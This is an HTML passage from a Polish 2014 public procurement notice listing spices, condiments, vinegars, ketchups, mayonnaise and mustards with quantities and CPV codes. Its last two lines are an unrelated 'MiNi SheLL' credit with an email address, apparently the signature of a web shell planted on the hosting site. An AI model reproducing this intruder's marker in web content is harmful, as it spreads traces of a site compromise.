<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.   Sól biała warzona jodowana spożywcza w opakowaniu 1 kg, ilość szacunkowa 1000 opakowań. CPV: 15872400-5.
2.  Pieprz czarny mielony w opakowaniu 15 g - 20 g, ilość szacunkowa 2000 opakowań. CPV: 15872100-2.
3   .Pieprz czarny mielony w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV: 15872100-4.   4.  Papryka ostra mielona w opakowaniu 20 g - 30 g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
5. Papryka słodka mielona w opakowaniu 20 g - 30 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
6. Liść laurowy w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
7. Przyprawa Vegeta Podravka w opakowaniu 75 g, ilość szacunkowa 1200 opakowań. Skład m.in.: sól kuchenna, suszone warzywa-15,5% (w tym: marchew, pasternak, cebula, seler, natka pietruszki). CPV: 15870000-7.
8. Przyprawa do potraw Warzywko uniwersalne - smak świeżych warzyw w opakowaniu 75 g, ilość szacunkowa 600 opakowań. Skład m.in.: sól, warzywa suszone-15,1% (w tym: marchew, cebula, pasternak, liście selera, natka pietruszki, czosnek, papryka, pomidory). CPV: 15870000-7.
9. Przyprawa Delikat do mięs 200 g, ilość szacunkowa 600 opakowań CPV: 15870000-7.
10. Czosnek granulowany w opakowaniu 20 g - 30 g, ilość szacunkowa 880 opakowań. CPV: 15870000-7. 
11. Czosnek granulowany w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV:15870000-7.
12. Majeranek w opakowaniu 20 g - 30 g, ilość szacunkowa 340 opakowań. CPV: 15870000-7.
13. Majeranek w opakowaniu 1 kg, ilość szacunkowa 200 opakowań. CPV: 15870000-7.
14. Oregano w opakowaniu 10 g - 20 g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
15. Liście bazylii w opakowaniu 10 g - 20 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
16. Cynamon mielony w opakowaniu 20 g - 30 g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
17. Koperek w opakowaniu 8 g - 15 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
18. Susz z liści pietruszki w opakowaniu 10 g - 20 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
19. Chili w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
20. Przyprawa do zup, sosów, sałatek w płynie Winiary 210 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
21. Przyprawa kucharek w opakowaniu 1 kg, ilość szacunkowa 200 opakowań. CPV: 15870000-7.
22. Kwasek cytrynowy do celów spożywczych w opakowaniu 20 g - 30 g, ilość szacunkowa 2550 opakowań. CPV: 15870000-7.
23. Soda oczyszczona do celów spożywczych w opakowaniu 75 g - 85 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
24. Zaprawa cytrynowa w opakowaniu 200 ml, ilość szacunkowa 600 opakowań.CPV:15870000-7.

25. Ziele angielskie w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
26. Przyprawa do kebaba-gyros 30 g - 50 g, ilość szacunkowa 600 opakowań. CPV: 157870000-7.
27. Żelatyna spożywcza wieprzowa zwykła od 50 g - 80 g, ilość szacunkowa 600 opakowań. CPV: 15892400-1.
28. Barszczyk czerwony koncentrat w opakowaniu szklanym od 300 g - 330 g, ilość szacunkowa 600 opakowań. CPV: 15891400-4.
29. Ocet spirytusowy rektyfikowany 10%, ocet wyprodukowany z przedestylowanego alkoholu pochodzenia rolniczego, w opakowaniu szklanym 500 g, ilość szacunkowa 200 opakowań. CPV: 15871110-8.
30. Ocet winny 6 % w opakowaniu szklanym 0,5l, ilość szacunkowa 200 opakowań. CPV: 15871120-1. 
31. Sos sojowy w opakowaniu szklanym 150 ml, ilość szacunkowa 200 opakowań. CPV: 15871210-9. 
32. Żur w opakowaniu szklanym 0,5l, zakwas z mąki żytniej i pszennej poddany naturalnej fermentacji, ilość szacunkowa 600 opakowań. CPV: 15851000-8.
33. Kminek mielony 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
34. Tymianek 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
35. Cząber 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
36. Pieprz ziołowy w opakowaniu od 20g-25 g ,ilość szacunkowa 300 opakowań, CPV:15872200-3
37. Przyprawa do kurczaka od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15871270-7.
38. Przyprawa do ryb od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15870000-7. 
39. Przyprawa meksykańska od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15871270-7.
40. Imbir w opakowaniu 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15872500-6.
41. Gałka muszkatołowa 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15870000-7.
42. Zioła prowansalskie 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15872300-4.
43. Curry w opakowaniu 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15870000-7.
44. Przyprawa do gulaszu od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15891500-5.
45. Przyprawa do ziemniaków od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15870000-7.
46. Kurkuma od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15870000-7.
47. Estragon  , od 20 g - 25 g il.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.24.00-5, 15.87.21.00-2, 15.87.00.00-7, 15.89.24.00-1, 15.89.14.00-4, 15.87.11.10-8, 15.87.11.20-1, 15.87.12.10-9, 15.85.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Włocławek koncentrat pomidorowy 30% w opakowaniu 1 litr, ilość szacunkowa 600 opakowań. CPV: 15331427-6.
2. Włocławek ketchup łagodny w opakowaniu 1 litr, ilość szacunkowa 600 opakowań. CPV: 15871230-5.
3. Włocławek ketchup pikantny w opakowaniu 480 g, ilość szacunkowa 1100 opakowań. CPV: 15871230-5.
4. Ketchup pikantny Pudliszki w opakowaniu 480 g, ilość szacunkowa 1100 opakowań. Skład m.in.: pomidory 183 g na 100 g ketchupu. CPV: 15871230-5.
5. Ketchup pikantny w opakowaniu 400 g - 500 g, ilość szacunkowa 2600 opakowań. CPV: 15871230-5.
6. Ketchup Tortex w tubie plastikowej 500 g, ilość szacunkowa 2000 opakowań, CPV:15871230
7. Majonez pomorski stołowy Ocetix w opakowaniu 260 g, ilość szacunkowa 2500 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
8. Majonez pomorski stołowy Ocetix w opakowaniu 620 g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
9. Majonez dekoracyjny Winiary w opakowaniu 400 ml, ilość szacunkowa 1000 opakowań. Skład m.in.: olej roślinny, żółtko jaj-6%, ocet, musztarda, cukier, sól. Średnia zawartość odżywcza w 100 ml produktu: tłuszcz 76,1 g. CPV: 15871273-8.
10. Majonez w tubie 450 g - 550 g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
11. Musztarda stołowa w opakowaniu plastikowym 180 g - 220 g, ilość szacunkowa 1000 opakowań. CPV: 15871250-1.
12. Musztarda sarepska w opakowaniu plastikowym 450 g - 550 g, ilość szacunkowa 1800 opakowań. CPV: 15871250-1.
13. Musztarda sarepska Ocetix w opakowaniu 180 g - 220 g, ilość szacunkowa 1400 opakowań. CPV: 15871250-1.
14. Chrzan tarty w opakowaniu 170 g - 200 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
15. Chrzan łowicki naturalny Urbanek w opakowaniu 180 g, ilość szacunkowa 900 opakowań. CPV: 15870000-7..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.27-6, 15.87.12.30-5, 15.87.12.73-8, 15.87.12.50-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com